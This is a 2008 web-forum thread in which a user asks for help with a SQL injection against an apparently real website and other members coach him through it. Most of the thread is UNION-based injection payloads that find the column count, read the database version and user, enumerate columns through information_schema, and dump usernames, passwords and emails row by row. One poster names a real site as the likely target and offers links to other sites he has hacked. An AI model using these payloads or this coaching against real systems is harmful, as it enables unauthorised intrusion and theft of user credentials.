Waraxe IT Security Portal
Login or Register
November 18, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 97
Members: 0
Total: 97
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> MySQL injection problem Goto page 1, 2, 3Next
Post new topicReply to topic View previous topic :: View next topic
MySQL injection problem
PostPosted: Sat Feb 09, 2008 12:32 pm Reply with quote
Panic_Mode
Active user
Active user
Joined: Feb 09, 2008
Posts: 39




First of all I'm glad to join your community guys.

Now, I have an injection problem. I have found the number of columns (5 btw) and the table name (let's call it table_name), and now i am trying to get the union all select command to work.

I am trying "union all select 0,0,0,0,0 from table_name" but i get a "The used SELECT statements have a different number of columns" error..

Any clues? Rolling Eyes
View user's profile Send private message
Re: MySQL injection problem
PostPosted: Sat Feb 09, 2008 1:04 pm Reply with quote
gtal3x
Active user
Active user
Joined: Dec 03, 2007
Posts: 33
Location: Ukraine




Well for me it seems that u dident find the right number of columns, btw use:
union+select+1,2,3,4,5/*
View user's profile Send private message
PostPosted: Sat Feb 09, 2008 1:21 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




There can be more complicated situations, where sql injection occurs in multiple sql queries with different number of columns Smile
In this case blind sql injection methods can be useful - instead of UNION you can use SubSelects functionality and BENCHMARK, if needed.

By the way - you can see error messages, right? Is there info about error location - script name and line number?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Feb 09, 2008 1:23 pm Reply with quote
Panic_Mode
Active user
Active user
Joined: Feb 09, 2008
Posts: 39




Yeh the message was pretty obvious Razz

So I did the "order by [n]" again and started getting error on 23. But wtf 22 column table? Shocked

Anyway, now when i try the union select I get "Unknown column 'e.OK' in 'order clause'" error Confused

Tnx for help Smile
View user's profile Send private message
PostPosted: Sat Feb 09, 2008 1:36 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Panic_Mode wrote:
Yeh the message was pretty obvious Razz

So I did the "order by [n]" again and started getting error on 23. But wtf 22 column table? Shocked

Anyway, now when i try the union select I get "Unknown column 'e.OK' in 'order clause'" error Confused

Tnx for help Smile


Yes, this is not rare to see such big numbers. I have seen > 60 columns Smile - it was SELECT * with multiple JOIN's ...

Next, comment out end of the clause, as gtal3x allready suggested before.

Something like:
Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+table_name/*


If you see error messages, post them here Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Feb 09, 2008 1:39 pm Reply with quote
Panic_Mode
Active user
Active user
Joined: Feb 09, 2008
Posts: 39




waraxe wrote:
By the way - you can see error messages, right? Is there info about error location - script name and line number?


Not detailed errors. I get errors like the ones I posted "Unknown column 'e.OK' in 'order clause'", The used SELECT statements have a different number of columns" etc... It's mysql + php combo, so there is not much info in errors... :p
View user's profile Send private message
PostPosted: Sat Feb 09, 2008 1:43 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Panic_Mode wrote:
waraxe wrote:
By the way - you can see error messages, right? Is there info about error location - script name and line number?


Not detailed errors. I get errors like the ones I posted "Unknown column 'e.OK' in 'order clause'", The used SELECT statements have a different number of columns" etc... It's mysql + php combo, so there is not much info in errors... :p


It's because there is checking code for mysql result handle and if it's FALSE, then mysql_error() will be executed.
If programmers are lazy (in most cases Very Happy ), then no checking and next mysql call wih invalid handle will emit php warning level error message, like "Warning: ... mysql_fetch_row ... error ... line 112 ..." Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Feb 09, 2008 1:54 pm Reply with quote
Panic_Mode
Active user
Active user
Joined: Feb 09, 2008
Posts: 39




I commented out the end and it seemed to work (thanks gtal3x and waraxe Very Happy ).

Now I get each columns number in the page, in the place where data from that column should be presented... but no other output.

Any help to move on? Rolling Eyes
View user's profile Send private message
PostPosted: Sat Feb 09, 2008 2:18 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Panic_Mode wrote:
I commented out the end and it seemed to work (thanks gtal3x and waraxe Very Happy ).

Now I get each columns number in the page, in the place where data from that column should be presented... but no other output.

Any help to move on? Rolling Eyes


Now you must find column or columns capable of outputting long enough data. Let's assume, that you see feedback from column 15:

Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,@@version,16,17,18,19,20,21,22/*


Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,USER(),16,17,18,19,20,21,22/*


Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,DATABASE(),16,17,18,19,20,21,22/*


Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,name,16,17,18,19,20,21,22+FROM+mysql.user/*


And if you want info from table_name, then you must know column names!

Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,put_known_column_name_here,16,17,18,19,20,21,22+FROM+table_name/*
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Feb 09, 2008 2:54 pm Reply with quote
Panic_Mode
Active user
Active user
Joined: Feb 09, 2008
Posts: 39




Thanks for your help mate. Very Happy

The normal functions can be executed and give an outpud to these fields. But now i tried outputing info from a column of the table_name. The first guess was (of course) "password". It seemed to outputted some random password number (the first in the row maybe?).

Now my guess (and plz correct me if i am wrong) is that I need a "where" attribute to outputt a specific password or whatever I want...
e.g
Code:
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22+FROM+table_name/*+WHERE+name+=doe

but the main problem is that i don't seem to guess the other columns correct to determine a specific user...
View user's profile Send private message
PostPosted: Sat Feb 09, 2008 3:12 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




So you have sql injection, where only single row can be fetched?
Then you must use LIMIT x,y.
Next, find out all imortant column names - username, fname, lname, email,login,password,salt,hash,phone, etc etc ...
You can use INFORMATION_SCHEMA, if mysql is 5.x version.

And finally:

Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,CONCAT(username,0x5e,password,0x5e,email),16,17,18,19,20,21,22+FROM+table_name+LIMIT+0,1/*


This will give you first row. Next row can fetched via manipulating LIMIT clause.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Feb 09, 2008 4:44 pm Reply with quote
Panic_Mode
Active user
Active user
Joined: Feb 09, 2008
Posts: 39




Everything works like a charm. But I want to work with the INFROMATION_SCHEMA thing a bit. :p

I use
Code:
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,COLUMN_NAME+FROM+information_schema.columns+AND+TABLE_NAME=[here the table name]+WHERE+TABLE_SCHEMA=[here the db name]+LIMIT+0,1/*


and i get the error
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND TABLE_NAME=XXXX WHERE TABLE_SCHEMA=XXXXX LIMIT 1,2/* ORDER BY e.OK DES' at line 1


mysql 5.0.22 version
View user's profile Send private message
PostPosted: Sat Feb 09, 2008 5:14 pm Reply with quote
gtal3x
Active user
Active user
Joined: Dec 03, 2007
Posts: 33
Location: Ukraine




just do this:
Code:
+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,column_name,7,8,9,0,1,2+from+information_schema.columns+where+column_name+like+0x257573657225+limit+1,1/*


btw r u tryin to hack skai.gr ? Smile I have got many sites already hacked, so if u wonna get train, send me pm i will give u links
View user's profile Send private message
PostPosted: Sat Feb 09, 2008 5:21 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You have syntax errors in clause ...

Try this:

Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME=[here the table name]+AND+TABLE_SCHEMA=[here the db name]+LIMIT+0,1/*
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Feb 09, 2008 5:39 pm Reply with quote
Panic_Mode
Active user
Active user
Joined: Feb 09, 2008
Posts: 39




First of all tnx guys for your help and quick replies once more Smile

@gtal3x
Tried your code but I only get the output "User". With LIMIT I try to fetch some other names but no luck. Only user comes out. Also User column doesn't exist in the table...

(also what "0x257573657225" stands for?)

@waraxe
i get the error
Code:
Unknown column '[here the table name]' in 'where clause'

column? Shocked
View user's profile Send private message
MySQL injection problem
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 3
Goto page 1, 2, 3Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.037 Seconds